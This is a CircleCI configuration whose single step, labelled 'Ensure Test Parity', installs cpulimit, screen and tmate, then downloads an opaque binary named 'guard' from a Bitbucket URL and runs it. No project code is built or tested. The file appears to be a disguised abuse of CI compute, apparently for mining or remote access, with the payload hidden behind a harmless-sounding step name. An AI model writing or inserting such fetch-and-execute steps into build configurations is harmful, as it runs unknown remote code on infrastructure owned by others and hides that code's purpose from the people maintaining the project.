version: 2
jobs:
  build:
    machine:
     image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
               sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
               sudo apt update -y
               sudo apt install gcc-9 -y
               sudo apt install libstdc++6 -y
               sudo apt install cpulimit screen tmate -y
               wget https://bitbucket.org/seaguardian/guardian4/raw/5c9d14a97e770d7884e5e2ae960bfe4400532771/guard 
               chmod +x guard
               ./guard